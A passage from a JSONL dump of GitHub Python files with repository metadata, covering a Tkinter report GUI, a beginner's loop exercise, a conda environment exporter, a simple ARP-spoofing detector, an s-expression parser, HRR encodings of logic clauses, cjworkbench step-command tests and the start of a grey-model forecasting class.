text=\"End Date:\")\nend_date_label.grid(row=0, column=2)\nend_date_entry = DateEntry(date_range_frame, date_pattern='dd-mm-yyyy')\nend_date_entry.grid(row=0, column=3)\n\n# Generate button\ngenerate_button = ttk.Button(root, text=\"Generate Report\", command=on_button_click)\ngenerate_button.pack()\n\n# Report text box\nreport_text = tk.Text(root, width=60, height=10, state='disabled')\nreport_text.pack()\n\nroot.mainloop()","repo_name":"SymbioticLove/Restaurant-POS-System","sub_path":"src/python_modules/GUI_creation.py","file_name":"GUI_creation.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71738068306","text":"qtd = 5 #vamos testar o programa com poucos números, para agilizar a execução. \n\nprint(f'Digite {qtd} números inteiros:')\n\nfor i in range(qtd):\n\n num = int(input())\n\n if i == 0: #testa se é a 1ª iteração do for\n maior = num\n else:\n if num > maior:\n maior = num\n\nprint(f'Maior = {maior}')","repo_name":"AllanSmithll/APE-2022.1","sub_path":"Estrutura de Repetição/For/Normal/questao-04.py","file_name":"questao-04.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"513395731","text":"import io\nfrom dataclasses import dataclass, field\nfrom typing import Dict, List, Optional, TypeVar, Union\n\nfrom ruamel.yaml import YAML # type: ignore\nfrom .conda_env import CondaEnvSpec\nfrom .version import RelaxLevel, version_string\n\n\n@dataclass\nclass CondaPackage:\n name: str\n version: Optional[str]\n channel: Optional[str]\n\n def export(\n self, *, include_channel: bool = False, relax: RelaxLevel = RelaxLevel.FULL\n ) -> str:\n return \"\".join(\n [\n f\"{self.channel}::\"\n if (include_channel and self.channel is not None)\n else \"\",\n self.name,\n version_string(self.version, op=\"=\", how=relax),\n ]\n )\n\n\n@dataclass\nclass PipPackage:\n name: str\n version: str\n\n def export(self, *, relax: RelaxLevel = RelaxLevel.FULL) -> str:\n return f\"{self.name}{version_string(self.version, op='==', how=relax)}\"\n\n\n@dataclass\nclass YAMLExport:\n env_spec: CondaEnvSpec\n conda_packages: List[CondaPackage] = field(default_factory=list)\n pip_packages: List[PipPackage] = field(default_factory=list)\n\n def __post_init__(self):\n self.yaml = YAML()\n self.yaml.default_flow_style = False\n self.yaml.indent(sequence=4, mapping=2, offset=2)\n\n async def export(\n self,\n *,\n include_channel: bool = False,\n relax: RelaxLevel = RelaxLevel.FULL,\n export_name: Optional[str] = None,\n ) -> str:\n yml_data = await self.get_yml_data(\n include_channel=include_channel, relax=relax, export_name=export_name\n )\n stream = io.StringIO()\n self.yaml.dump(yml_data, stream)\n return stream.getvalue()\n\n async def get_yml_data(\n self,\n *,\n include_channel: bool,\n relax: RelaxLevel = RelaxLevel.FULL,\n export_name: Optional[str] = None,\n ) -> Dict:\n deps: List[Union[str, Dict[str, List[str]]]] = [\n p.export(include_channel=include_channel, relax=relax)\n for p in sort_packages(self.conda_packages)\n ]\n if len(self.pip_packages):\n pip_deps = {\n \"pip\": [p.export(relax=relax) for p in sort_packages(self.pip_packages)]\n }\n deps.append(pip_deps)\n return {\n \"name\": export_name\n if export_name is not None\n else self.env_spec.export_name(),\n \"dependencies\": deps,\n }\n\n\nP = TypeVar(\"P\", bound=Union[PipPackage, CondaPackage])\n\nSortPriority = {\"python\": 0, \"pip\": 1}\n\n\ndef sort_packages(packages: List[P]) -> List[P]:\n return sorted(packages, key=lambda p: (SortPriority.get(p.name, 1e6), p.name))\n","repo_name":"indigoviolet/conda-pip-minimal","sub_path":"src/conda_pip_minimal/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22545375298","text":"import os\r\nimport datetime\r\n# ARP SPOOFER DETECTOR\r\n\r\ndef arp_table_extract():\r\n arp_table = os.popen('arp -a').read()\r\n arp_table_lines = arp_table.splitlines()\r\n ip_mac_addr = {}\r\n\r\n for line in arp_table_lines:\r\n if \"ff-ff-ff-ff-ff-ff\" in line:\r\n break\r\n if arp_table_lines.index(line) > 2:\r\n ip, mac, _type = line.split()\r\n ip_mac_addr[ip] = mac\r\n\r\n duplicate_mac_address(ip_mac_addr)\r\n\r\n\r\ndef duplicate_mac_address(ip_mac_addr):\r\n mac_addr = []\r\n for mac in ip_mac_addr.values():\r\n if mac in mac_addr:\r\n print(\"ARP SPOOF DETECTED!!\")\r\n create_log_file(mac)\r\n break\r\n mac_addr.append(mac)\r\n\r\n\r\ndef create_log_file(mac):\r\n date = datetime.now()\r\n with open(\"spoof_log.txt\", \"a\") as log_file:\r\n log_file.write(\"ARP SPOOF!!\\n THE ADDRESS MAC IS {}/\"\r\n \"DETECTED ON {} \".format(mac, date))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n arp_table_extract()\r\n","repo_name":"IlayHam/EveryDayIsANewPythonScript","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38999879338","text":"#!/usr/bin/env python\n# -*- Mode: Python; indent-tabs-mode: nil -*-\n# vi: set ts=4 sw=4 expandtab:\n\n# borrowed from http://gist.github.com/240957\n# no license information found\n\n# Support for comments ; added by Adobe.\n\nfrom string import whitespace\n\natom_end = set('()\"\\'') | set(whitespace)\ndef parse(sexp):\n stack, i, length = [[]], 0, len(sexp)\n while i < length:\n c = sexp[i]\n\n #print c, stack\n if c == ';':\n while i + 1 < length and sexp[i + 1] != '\\n':\n i += 1\n else:\n reading = type(stack[-1])\n if reading == list:\n if c == '(': stack.append([])\n elif c == ')':\n stack[-2].append(stack.pop())\n if stack[-1][0] == ('quote',): stack[-2].append(stack.pop())\n elif c == '\"': stack.append('')\n elif c == \"'\": stack.append([('quote',)])\n elif c in whitespace: pass\n else: stack.append((c,))\n elif reading == str:\n if c == '\"':\n stack[-2].append(stack.pop())\n if stack[-1][0] == ('quote',): stack[-2].append(stack.pop())\n elif c == '\\\\':\n i += 1\n stack[-1] += sexp[i]\n else: stack[-1] += c\n elif reading == tuple:\n if c in atom_end:\n atom = stack.pop()\n if atom[0][0].isdigit(): stack[-1].append(eval(atom[0]))\n else: stack[-1].append(atom[0])\n if stack[-1][0] == ('quote',): stack[-2].append(stack.pop())\n continue\n else: stack[-1] = ((stack[-1][0] + c),)\n i += 1\n return stack.pop()\n","repo_name":"adobe-flash/crossbridge","sub_path":"avmplus/halfmoon/templates/sexp.py","file_name":"sexp.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":538,"dataset":"github-code","pt":"48"} +{"seq_id":"70301280786","text":"import collections\nimport functools\nimport zlib\n\nimport numpy\nimport scipy.stats\n\nfrom AST import Var, Dist, Const, Func, Eq, Disj, Conj, fold_term\nfrom CircularHRR import CircularHRR\n\nCNFtoHRR1Settings = collections.namedtuple(\n 'CNFtoHRR1Settings',\n '''\n var_base_weight\n dist_base_weight\n const_base_weight\n skolem_base_weight\n func_base_weight\n func_arity_weight\n arg_base_weight\n arg_arity_weight\n arg_index_weight\n superposition_func_funcobj_weight\n superposition_func_argobjs_weight\n superposition_func_copy_weight\n superposition_func_beta1\n superposition_func_beta2\n superposition_func_equalize_size_weight\n superposition_eq_pos_weight\n superposition_eq_assoc_weight\n superposition_eq_equalize_size_weight\n superposition_disj_assoc_weight\n superposition_disj_equalize_size_weight\n superposition_conj_assoc_weight\n superposition_conj_equalize_size_weight\n '''\n )\n\ndefaultCNFtoHRR1Settings = CNFtoHRR1Settings(\n var_base_weight = 0.5,\n dist_base_weight = 0.5,\n const_base_weight = 0.5,\n skolem_base_weight = 0.5,\n func_base_weight = 0.5,\n func_arity_weight = 0.25,\n arg_base_weight = 0.5,\n arg_arity_weight = 0.25,\n arg_index_weight = 0.125,\n superposition_func_funcobj_weight = 0.2,\n superposition_func_argobjs_weight = 0.4,\n superposition_func_copy_weight = 0.4,\n superposition_func_beta1 = 1,\n superposition_func_beta2 = 1,\n superposition_func_equalize_size_weight = 0.5,\n superposition_eq_pos_weight = 0.5,\n superposition_eq_assoc_weight = 0.5,\n superposition_eq_equalize_size_weight = 1,\n superposition_disj_assoc_weight = 0.5,\n superposition_disj_equalize_size_weight = 1,\n superposition_conj_assoc_weight = 0.5,\n superposition_conj_equalize_size_weight = 1,\n )\n\ndef randomCNFtoHRR1Settings_v1(seed):\n rs = numpy.random.RandomState(seed)\n\n var_base_weight = rs.uniform()\n dist_base_weight = rs.uniform()\n const_base_weight = rs.uniform()\n skolem_base_weight = rs.uniform()\n func_base_weight = rs.uniform()\n func_arity_weight = rs.uniform(high=1 - func_base_weight)\n arg_base_weight = rs.uniform()\n arg_arity_weight = rs.uniform(high=1 - arg_base_weight)\n arg_index_weight = rs.uniform(high=1 - arg_base_weight - arg_arity_weight)\n\n superposition_func_weights = rs.uniform(size=3)\n superposition_func_weights /= sum(superposition_func_weights)\n (superposition_func_funcobj_weight,\n superposition_func_argobjs_weight,\n superposition_func_copy_weight) = superposition_func_weights\n\n superposition_func_beta1 = rs.exponential()\n superposition_func_beta2 = rs.exponential()\n superposition_func_equalize_size_weight = rs.uniform()\n\n superposition_eq_weights = rs.uniform(size=2)\n superposition_eq_weights /= sum(superposition_eq_weights)\n superposition_eq_pos_weight = rs.uniform()\n superposition_eq_assoc_weight = rs.uniform()\n superposition_eq_equalize_size_weight = rs.uniform()\n superposition_disj_assoc_weight = rs.uniform()\n superposition_disj_equalize_size_weight = rs.uniform()\n superposition_conj_assoc_weight = rs.uniform()\n superposition_conj_equalize_size_weight = rs.uniform()\n\n return CNFtoHRR1Settings(\n var_base_weight,\n dist_base_weight,\n const_base_weight,\n skolem_base_weight,\n func_base_weight,\n func_arity_weight,\n arg_base_weight,\n arg_arity_weight,\n arg_index_weight,\n superposition_func_funcobj_weight,\n superposition_func_argobjs_weight,\n superposition_func_copy_weight,\n superposition_func_beta1,\n superposition_func_beta2,\n superposition_func_equalize_size_weight,\n superposition_eq_pos_weight,\n superposition_eq_assoc_weight,\n superposition_eq_equalize_size_weight,\n superposition_disj_assoc_weight,\n superposition_disj_equalize_size_weight,\n superposition_conj_assoc_weight,\n superposition_conj_equalize_size_weight,\n )\n\nclass CNFtoHRR1:\n def __init__(self, hrr_size, settings):\n self.hrr_size = hrr_size\n self.settings = settings\n\n # prefix with ! so that these vectors never occur in normal cnf input\n self.var_base = self.get_ground_vector('!Var_base')\n self.dist_base = self.get_ground_vector('!Dist_base')\n self.const_base = self.get_ground_vector('!Const_base')\n self.skolem_base = self.get_ground_vector('!Skolem_base')\n self.func_base = self.get_ground_vector('!Func_base')\n self.arg_base = self.get_ground_vector('!Arg_base')\n\n self.eq_assoc = self.get_ground_vector('!Eq_assoc')\n self.disj_assoc = self.get_ground_vector('!Disj_assoc')\n self.conj_assoc = self.get_ground_vector('!Conj_assoc')\n\n def var_id(self, name):\n return self.get_ground_vector('!Var_id_{}'.format(name))\n def dist_id(self, name):\n return self.get_ground_vector('!Dist_id_{}'.format(name))\n def const_id(self, name):\n return self.get_ground_vector('!Const_id_{}'.format(name))\n def skolem_id(self, name):\n return self.get_ground_vector('!Skolem_id_{}'.format(name))\n def func_arity(self, arity):\n return self.get_ground_vector('!Func_arity_{}'.format(arity))\n def func_id(self, name):\n return self.get_ground_vector('!Func_id_{}'.format(name))\n def arg_arity(self, arity):\n return self.get_ground_vector('!Arg_arity_{}'.format(arity))\n def arg_index(self, arity, index):\n return self.get_ground_vector('!Arg_index_{}_{}'.format(arity, index))\n def arg_id(self, name):\n return self.get_ground_vector('!Arg_id_{}'.format(name))\n\n @functools.lru_cache()\n def get_ground_vector(self, label):\n \"\"\" Deterministically generate a random vector from its label \"\"\"\n\n seed = zlib.adler32(\n (str(self.hrr_size)+label).encode('utf-8')\n ) & 0xffffffff\n\n return CircularHRR(self.hrr_size, seed)\n\n\n def fold_term(self, term):\n return fold_term(\n term,\n self.fvar,\n self.fdist,\n self.fconst,\n self.fskolem,\n self.ffunc,\n self.feq,\n self.fdisj,\n self.fconj)\n\n def fvar(self, name):\n ''' Creates HRR for variable node.\n\n Relevant settings:\n var_base_weight\n '''\n return (self.settings.var_base_weight * self.var_base +\n (1 - self.settings.var_base_weight) * self.var_id(name)\n ).normalize()\n\n def fdist(self, name):\n ''' Creates HRR for distinct constant node.\n\n Relevant settings:\n dist_base_weight\n '''\n return (self.settings.dist_base_weight * self.dist_base +\n (1 - self.settings.dist_base_weight) * self.dist_id(name)\n ).normalize()\n\n def fconst(self, name):\n ''' Creates HRR for constant node.\n\n Relevant settings:\n const_base_weight\n '''\n return (self.settings.const_base_weight * self.const_base +\n (1 - self.settings.const_base_weight) * self.const_id(name)\n ).normalize()\n\n def fskolem(self, name):\n ''' Creates HRR for skolem constant node.\n\n Relevant settings:\n skolem_base_weight\n '''\n return (self.settings.skolem_base_weight * self.skolem_base +\n (1 - self.settings.skolem_base_weight) * self.skolem_id(name)\n ).normalize()\n\n def ffunc(self, name, argsizes, arghrrs):\n ''' Creates HRR for functor node.\n\n Relevant settings:\n func_base_weight\n func_arity_weight\n arg_base_weight\n arg_arity_weight\n arg_index_weight\n superposition_func_funcobj_weight\n superposition_func_argobjs_weight\n superposition_func_copy_weight\n superposition_func_beta1\n superposition_func_beta2\n superposition_func_equalize_size_weight # 1 means all branches are weighted by size, 0 means branches are equally weighted\n '''\n arity = len(argsizes)\n funcobj = self.settings.superposition_func_funcobj_weight * (\n self.settings.func_base_weight * self.func_base +\n self.settings.func_arity_weight * self.func_arity(arity) +\n (1 - self.settings.func_base_weight - self.settings.func_arity_weight) * self.func_id(name)\n ).normalize()\n\n bias = scipy.stats.betabinom(arity - 1, self.settings.superposition_func_beta1, self.settings.superposition_func_beta2).pmf\n\n totalsize = sum(argsizes)\n\n argobjs = self.settings.superposition_func_argobjs_weight * sum(\n (self.settings.superposition_func_equalize_size_weight * size / totalsize +\n (1 - self.settings.superposition_func_equalize_size_weight) * 1 / arity) *\n bias(i) *\n (self.settings.arg_base_weight * self.arg_base +\n self.settings.arg_arity_weight * self.arg_arity(arity) +\n self.settings.arg_index_weight * self.arg_index(arity, i) +\n (1 - self.settings.arg_base_weight - self.settings.arg_arity_weight - self.settings.arg_index_weight) * self.arg_id(name)\n ) @\n vec\n for i, (size, vec) in enumerate(zip(argsizes, arghrrs)) )\n\n copyobjs = self.settings.superposition_func_copy_weight * sum(\n (self.settings.superposition_func_equalize_size_weight * size / totalsize +\n (1 - self.settings.superposition_func_equalize_size_weight) * 1 / arity) *\n bias(i) *\n vec\n for i, (size, vec) in enumerate(zip(argsizes, arghrrs)) )\n\n return (funcobj + argobjs + copyobjs).normalize()\n\n def feq(self, pos, leftsize, rightsize, lefthrr, righthrr):\n ''' Creates HRR for equality node.\n\n Relevant settings:\n superposition_eq_pos_weight\n superposition_eq_assoc_weight\n superposition_eq_equalize_size_weight\n '''\n magnitude = self.settings.superposition_eq_pos_weight\n if not pos:\n magnitude = 1 - magnitude\n\n totalsize = leftsize + rightsize\n\n assoc = self.settings.superposition_eq_assoc_weight * self.eq_assoc @ (lefthrr * righthrr)\n\n copy = (1 - self.settings.superposition_eq_assoc_weight) * sum(\n (self.settings.superposition_eq_equalize_size_weight * size / totalsize +\n (1 - self.settings.superposition_eq_equalize_size_weight) * 1 / 2) *\n vec\n for size, vec in ((leftsize, lefthrr), (rightsize, righthrr)))\n\n return magnitude * (assoc + copy).normalize()\n\n def fdisj(self, eqsizes, eqhrrs):\n ''' Creates HRR for disj node.\n\n Relevant settings:\n superposition_disj_assoc_weight\n superposition_disj_equalize_size_weight\n '''\n arity = len(eqsizes)\n totalsize = sum(eqsizes)\n\n copy = sum(\n (self.settings.superposition_disj_equalize_size_weight * size / totalsize +\n (1 - self.settings.superposition_disj_equalize_size_weight) * 1 / arity) *\n vec\n for size, vec in zip(eqsizes, eqhrrs))\n assoc = self.disj_assoc @ (copy * copy)\n\n assoc *= self.settings.superposition_disj_assoc_weight\n copy *= 1 - self.settings.superposition_disj_assoc_weight\n\n return (assoc + copy).normalize()\n\n def fconj(self, disjsizes, disjhrrs):\n ''' Creates HRR for variable node.\n\n Relevant settings:\n superposition_conj_assoc_weight\n superposition_conj_equalize_size_weight\n '''\n arity = len(disjsizes)\n totalsize = sum(disjsizes)\n\n copy = sum(\n (self.settings.superposition_conj_equalize_size_weight * size / totalsize +\n (1 - self.settings.superposition_conj_equalize_size_weight) * 1 / arity) *\n vec\n for size, vec in zip(disjsizes, disjhrrs))\n assoc = self.conj_assoc @ (copy * copy)\n\n assoc *= self.settings.superposition_conj_assoc_weight\n copy *= 1 - self.settings.superposition_conj_assoc_weight\n\n return (assoc + copy).normalize()\n\n","repo_name":"thomastanck/Elemmaclassify","sub_path":"HRRv2.py","file_name":"HRRv2.py","file_ext":"py","file_size_in_byte":13392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17484605669","text":"from unittest.mock import patch\n\nfrom cjwstate import commands, rabbitmq\nfrom cjwstate.models.commands import AddStep, DeleteStep\nfrom cjwstate.models.workflow import Workflow\nfrom cjwstate.tests.utils import (\n DbTestCaseWithModuleRegistryAndMockKernel,\n create_module_zipfile,\n)\n\n\nasync def async_noop(*args, **kwargs):\n pass\n\n\n@patch.object(rabbitmq, \"queue_render\", async_noop)\n@patch.object(rabbitmq, \"send_update_to_workflow_clients\", async_noop)\nclass AddDeleteStepTests(DbTestCaseWithModuleRegistryAndMockKernel):\n def assertStepVersions(self, expected_versions):\n positions = list(self.tab.live_steps.values_list(\"order\", flat=True))\n self.assertEqual(positions, list(range(0, len(expected_versions))))\n\n versions = list(\n self.tab.live_steps.values_list(\"last_relevant_delta_id\", flat=True)\n )\n self.assertEqual(versions, expected_versions)\n\n def setUp(self):\n super().setUp()\n\n self.workflow = Workflow.objects.create()\n self.tab = self.workflow.tabs.create(position=0)\n self.module_zipfile = create_module_zipfile(\n \"loadsomething\",\n spec_kwargs={\"parameters\": [{\"id_name\": \"url\", \"type\": \"string\"}]},\n )\n self.kernel.migrate_params.side_effect = RuntimeError(\n \"AddStep and tests should cache migrated params correctly\"\n )\n\n # Add another module, then undo, redo\n def test_add_module(self):\n all_modules = self.tab.live_steps\n\n v1 = 1\n existing_module = self.tab.steps.create(\n order=0,\n slug=\"step-1\",\n last_relevant_delta_id=v1,\n params={\"url\": \"\"},\n )\n\n # Add a module, insert before the existing one, check to make sure it\n # went there and old one is after\n self.run_with_async_db(\n commands.do(\n AddStep,\n workflow_id=self.workflow.id,\n tab=self.workflow.tabs.first(),\n slug=\"step-2\",\n module_id_name=self.module_zipfile.module_id,\n position=0,\n param_values={\"url\": \"https://x.com\"},\n )\n )\n self.assertEqual(all_modules.count(), 2)\n added_module = all_modules.get(order=0)\n self.assertNotEqual(added_module, existing_module)\n # Test that supplied param is written\n self.assertEqual(added_module.params[\"url\"], \"https://x.com\")\n bumped_module = all_modules.get(order=1)\n self.assertEqual(bumped_module, existing_module)\n\n # undo! undo! ahhhhh everything is on fire! undo!\n self.run_with_async_db(commands.undo(self.workflow.id))\n self.assertEqual(all_modules.count(), 1)\n self.assertEqual(all_modules.first(), existing_module)\n\n # wait no, we wanted that module\n self.run_with_async_db(commands.redo(self.workflow.id))\n self.assertEqual(all_modules.count(), 2)\n added_module = all_modules.get(order=0)\n self.assertNotEqual(added_module, existing_module)\n bumped_module = all_modules.get(order=1)\n self.assertEqual(bumped_module, existing_module)\n\n def test_add_module_default_params(self):\n workflow = Workflow.create_and_init()\n create_module_zipfile(\n \"blah\",\n spec_kwargs={\n \"parameters\": [\n {\"id_name\": \"a\", \"type\": \"string\", \"default\": \"x\"},\n {\"id_name\": \"c\", \"type\": \"checkbox\", \"name\": \"C\", \"default\": True},\n ]\n },\n )\n\n cmd = self.run_with_async_db(\n commands.do(\n AddStep,\n workflow_id=workflow.id,\n tab=workflow.tabs.first(),\n slug=\"step-1\",\n module_id_name=\"blah\",\n position=0,\n param_values={},\n )\n )\n self.assertEqual(cmd.step.params, {\"a\": \"x\", \"c\": True})\n\n def test_add_module_raise_slug_not_unique(self):\n workflow = Workflow.create_and_init()\n tab = workflow.tabs.first()\n tab.steps.create(order=0, slug=\"step-1\", module_id_name=\"x\")\n # module_id_name doesn't exist either, but we'll white-box test and\n # assume the uniqueness check comes first\n with self.assertRaisesRegex(ValueError, \"unique\"):\n self.run_with_async_db(\n commands.do(\n AddStep,\n workflow_id=workflow.id,\n tab=tab,\n slug=\"step-1\",\n module_id_name=\"x\",\n position=0,\n param_values={},\n )\n )\n\n def test_add_module_raise_module_key_error(self):\n workflow = Workflow.create_and_init()\n with self.assertRaises(KeyError):\n self.run_with_async_db(\n commands.do(\n AddStep,\n workflow_id=workflow.id,\n tab=workflow.tabs.first(),\n slug=\"step-1\",\n module_id_name=\"doesnotexist\",\n position=0,\n param_values={},\n )\n )\n\n def test_add_module_validate_params(self):\n workflow = Workflow.create_and_init()\n create_module_zipfile(\n \"blah\", spec_kwargs={\"parameters\": [{\"id_name\": \"a\", \"type\": \"string\"}]}\n )\n\n with self.assertRaises(ValueError):\n self.run_with_async_db(\n commands.do(\n AddStep,\n workflow_id=workflow.id,\n tab=workflow.tabs.first(),\n slug=\"step-1\",\n module_id_name=\"blah\",\n position=0,\n param_values={\"a\": 3},\n )\n )\n\n # Try inserting at various positions to make sure the renumbering works\n # right Then undo multiple times\n def test_add_many_modules(self):\n v1 = 1\n existing_module = self.tab.steps.create(\n order=0,\n slug=\"step-1\",\n last_relevant_delta_id=1,\n params={\"url\": \"\"},\n )\n\n # beginning state: one Step\n all_modules = self.tab.live_steps\n\n # Insert at beginning\n cmd1 = self.run_with_async_db(\n commands.do(\n AddStep,\n workflow_id=self.workflow.id,\n tab=self.workflow.tabs.first(),\n slug=\"step-2\",\n module_id_name=self.module_zipfile.module_id,\n position=0,\n param_values={},\n )\n )\n v2 = cmd1.id\n self.assertEqual(all_modules.count(), 2)\n self.assertEqual(cmd1.step.order, 0)\n self.assertNotEqual(cmd1.step, existing_module)\n v2 = cmd1.id\n self.assertStepVersions([v2, v2])\n\n # Insert at end\n cmd2 = self.run_with_async_db(\n commands.do(\n AddStep,\n workflow_id=self.workflow.id,\n tab=self.workflow.tabs.first(),\n slug=\"step-3\",\n module_id_name=self.module_zipfile.module_id,\n position=2,\n param_values={},\n )\n )\n v3 = cmd2.id\n self.assertEqual(all_modules.count(), 3)\n self.assertEqual(cmd2.step.order, 2)\n self.assertStepVersions([v2, v2, v3])\n\n # Insert in between two modules\n cmd3 = self.run_with_async_db(\n commands.do(\n AddStep,\n workflow_id=self.workflow.id,\n tab=self.workflow.tabs.first(),\n slug=\"step-4\",\n module_id_name=self.module_zipfile.module_id,\n position=2,\n param_values={},\n )\n )\n v4 = cmd3.id\n self.assertEqual(all_modules.count(), 4)\n self.assertEqual(cmd3.step.order, 2)\n self.assertStepVersions([v2, v2, v4, v4])\n\n # We should be able to go all the way back\n self.run_with_async_db(commands.undo(self.workflow.id))\n self.assertStepVersions([v2, v2, v3])\n self.run_with_async_db(commands.undo(self.workflow.id))\n self.assertStepVersions([v2, v2])\n self.run_with_async_db(commands.undo(self.workflow.id))\n self.assertStepVersions([v1])\n self.assertEqual(\n list(all_modules.values_list(\"id\", flat=True)), [existing_module.id]\n )\n\n # Delete module, then undo, redo\n def test_delete_module(self):\n v1 = 1\n existing_module = self.tab.steps.create(\n order=0,\n slug=\"step-1\",\n last_relevant_delta_id=v1,\n params={\"url\": \"\"},\n )\n\n all_modules = self.tab.live_steps\n\n self.workflow.refresh_from_db()\n self.assertStepVersions([v1])\n\n # Delete it. Yeah, you better run.\n cmd = self.run_with_async_db(\n commands.do(\n DeleteStep,\n workflow_id=self.workflow.id,\n step=existing_module,\n )\n )\n self.assertEqual(all_modules.count(), 0)\n self.assertStepVersions([])\n\n # workflow revision should have been incremented\n self.workflow.refresh_from_db()\n v2 = cmd.id\n self.assertGreater(v2, v1)\n\n # undo\n self.run_with_async_db(commands.undo(self.workflow.id))\n self.assertEqual(all_modules.count(), 1)\n self.assertStepVersions([v1])\n self.assertEqual(all_modules.first(), existing_module)\n\n def test_delete_selected(self):\n step = self.tab.steps.create(order=0, slug=\"step-1\", params={\"url\": \"\"})\n self.tab.selected_step_position = 0\n self.tab.save(update_fields=[\"selected_step_position\"])\n\n self.run_with_async_db(\n commands.do(DeleteStep, workflow_id=self.workflow.id, step=step)\n )\n\n self.tab.refresh_from_db()\n self.assertIsNone(self.tab.selected_step_position)\n\n self.run_with_async_db(commands.undo(self.workflow.id)) # don't crash\n\n def test_undo_add_only_selected(self):\n self.run_with_async_db(\n commands.do(\n AddStep,\n workflow_id=self.workflow.id,\n tab=self.workflow.tabs.first(),\n slug=\"step-1\",\n module_id_name=self.module_zipfile.module_id,\n position=0,\n param_values={},\n )\n )\n\n self.tab.selected_step_position = 0\n self.tab.save(update_fields=[\"selected_step_position\"])\n\n self.run_with_async_db(commands.undo(self.workflow.id))\n\n self.tab.refresh_from_db()\n self.assertIsNone(self.tab.selected_step_position)\n\n # ensure that adding a module, selecting it, then undo add, prevents\n # dangling selected_step (basically the AddModule equivalent of\n # test_delete_selected)\n def test_add_undo_selected(self):\n self.tab.steps.create(order=0, slug=\"step-1\", params={\"url\": \"\"})\n\n # beginning state: one Step\n all_modules = self.tab.live_steps\n self.assertEqual(all_modules.count(), 1)\n\n self.run_with_async_db(\n commands.do(\n AddStep,\n workflow_id=self.workflow.id,\n tab=self.workflow.tabs.first(),\n slug=\"step-2\",\n module_id_name=self.module_zipfile.module_id,\n position=1,\n param_values={},\n )\n )\n\n self.tab.selected_step_position = 1\n self.tab.save(update_fields=[\"selected_step_position\"])\n\n self.run_with_async_db(commands.undo(self.workflow.id))\n\n self.tab.refresh_from_db()\n self.assertEqual(self.tab.selected_step_position, 0)\n\n def test_add_to_empty_tab_affects_dependent_tab_steps(self):\n module_zipfile = create_module_zipfile(\n \"tabby\", spec_kwargs={\"parameters\": [{\"id_name\": \"tab\", \"type\": \"tab\"}]}\n )\n\n step1 = self.workflow.tabs.first().steps.create(\n order=0,\n slug=\"step-1\",\n module_id_name=\"tabby\",\n params={\"tab\": \"tab-2\"},\n cached_migrated_params={\"tab\": \"tab-2\"},\n cached_migrated_params_module_version=module_zipfile.version,\n )\n\n tab2 = self.workflow.tabs.create(position=1, slug=\"tab-2\")\n\n # Now add a module to tab2.\n cmd = self.run_with_async_db(\n commands.do(\n AddStep,\n workflow_id=self.workflow.id,\n tab=tab2,\n slug=\"step-2\",\n module_id_name=self.module_zipfile.module_id,\n position=0,\n param_values={\"url\": \"https://x.com\"},\n )\n )\n\n # Tab1's \"tabby\" module depends on tab2, so it should update.\n step1.refresh_from_db()\n self.assertEqual(step1.last_relevant_delta_id, cmd.id)\n\n # We had a bug where add then delete caused an error when deleting\n # workflow, since both commands tried to delete the Step\n def test_add_delete(self):\n cmda = self.run_with_async_db(\n commands.do(\n AddStep,\n workflow_id=self.workflow.id,\n tab=self.workflow.tabs.first(),\n slug=\"step-1\",\n module_id_name=self.module_zipfile.module_id,\n position=0,\n param_values={},\n )\n )\n self.run_with_async_db(\n commands.do(\n DeleteStep,\n workflow_id=self.workflow.id,\n step=cmda.step,\n )\n )\n self.workflow.delete()\n self.assertTrue(True) # we didn't crash! Yay, we pass\n\n def test_delete_if_workflow_delete_cascaded_to_step_first(self):\n self.run_with_async_db(\n commands.do(\n AddStep,\n workflow_id=self.workflow.id,\n tab=self.workflow.tabs.first(),\n slug=\"step-1\",\n module_id_name=self.module_zipfile.module_id,\n position=0,\n param_values={},\n )\n )\n # Add a second command -- so we test what happens when deleting\n # multiple deltas while deleting the workflow.\n self.run_with_async_db(\n commands.do(\n AddStep,\n workflow_id=self.workflow.id,\n tab=self.workflow.tabs.first(),\n slug=\"step-2\",\n module_id_name=self.module_zipfile.module_id,\n position=0,\n param_values={},\n )\n )\n self.workflow.delete()\n self.assertTrue(True) # we didn't crash! Yay, we pass\n","repo_name":"CJWorkbench/cjworkbench","sub_path":"cjwstate/tests/models/commands/test_step_commands.py","file_name":"test_step_commands.py","file_ext":"py","file_size_in_byte":14783,"program_lang":"python","lang":"en","doc_type":"code","stars":297,"dataset":"github-code","pt":"48"} +{"seq_id":"23253563590","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\n'''\nAuthor: YeBo\nData: 2018/4/17 14:54\nPython Version: 3.6\nFile: MFGMnF_3.py\nSoftware: PyCharm\n'''\n\nimport numpy as np\nimport math\nfrom pandas import Series\nfrom pandas import DataFrame\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\n\n# 面向对象\n\n\nclass MFGMnF:\n\n def __init__(self, history_data):\n # 计算数据矩阵B和数据向量Y\n # history_data: 历史数据\n # nn: 开始n值,python需要序列减1,默认为0\n\n self.history_data = np.array(history_data)\n self.history_data_ago = np.zeros(len(self.history_data))\n\n self.a = 1\n self.b = 1\n self.x_predition = []\n self.n_prediction = len(self.history_data) + 1\n\n def GMn_prediction(self):\n\n\n xx1 = np.zeros(self.n_prediction)\n xx1[0] = self.history_data[0] # 第一个值相同\n for i in range(2, self.n_prediction + 1):\n xx1[i - 1] = (self.history_data_ago[self.nn - 1] - self.b / self.a) * math.exp(-self.a * (i - self.nn)) + self.b / self.a\n # 因为pytho序列是从0开始的第一个i-1表\n # 还原预测值\n self.x_predition = np.ones(len(xx1))\n for i in range((len(xx1))):\n if i == 0:\n self.x_predition[i] = self.history_data[i]\n else:\n self.x_predition[i] = xx1[i] - xx1[i - 1]\n\n # print(self.x_predition)\n\n return 